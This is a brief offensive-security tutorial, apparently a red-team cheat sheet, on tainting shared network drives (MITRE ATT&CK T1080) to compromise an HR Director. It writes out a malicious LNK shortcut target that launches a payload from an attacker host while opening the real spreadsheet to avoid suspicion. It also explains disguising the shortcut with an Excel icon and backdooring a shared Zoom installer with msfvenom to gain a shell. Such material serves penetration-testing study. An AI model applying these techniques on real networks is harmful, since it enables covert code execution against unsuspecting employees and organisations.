Taint Shared Content (T1080)
Setting a trap where the users graze.
1. The Scenario
You are on a workstation. You see a mapped drive Z: \HR_Share. You can Write to it.
- Goal: Compromise the HR Director.
2. LNK Files (Shortcut Tampering)
- Attack: Replace
Salary_Report.xlsxwithSalary_Report.lnk. - Target:
# LNK Target cmd.exe /c start \\AttackerIP\Payload.exe & start \\FileServer\Real_Report.xlsx - Icon: Change the LNK icon to look like Excel.
- Result: User clicks, gets a shell, and the real file opens (to reduce suspicion).
3. Backdooring Installers
If IT puts software installers on a share (\\IT_Share\Installers\ZoomInstaller.exe).
- Attack: Use Msfvenom or a binder to add your payload to
ZoomInstaller.exe. - Result: Next time IT installs Zoom on a new laptop, you get a shell.